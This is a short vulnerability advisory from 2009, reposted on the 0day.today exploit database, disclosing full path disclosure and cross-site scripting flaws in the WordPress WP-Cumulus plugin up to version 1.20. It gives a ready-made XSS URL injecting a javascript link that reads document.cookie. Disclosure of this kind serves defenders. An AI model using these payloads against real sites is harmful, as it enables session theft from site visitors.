[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress WP-Cumulus <= 1.20 Vulnerabilities

Author
MustLive
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10030
Category
web applications
Date add
25-11-2009
Platform
unsorted
===================================================
Vulnerabilities in WP-Cumulus <= 1.20 for WordPress
===================================================

I want to warn you about security vulnerabilities in plugin WP-Cumulus for
WordPress.
 
These are Full path disclosure and Cross-Site Scripting vulnerabilities.
 
Full path disclosure:
 
http://server/wp-content/plugins/wp-cumulus/wp-cumulus.php
 
XSS:
 
http://server/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
 
Code will execute after click. It's strictly social XSS.
 
Vulnerable are WP-Cumulus 1.20 and previous versions.


#  0day.today [2024-11-16]  #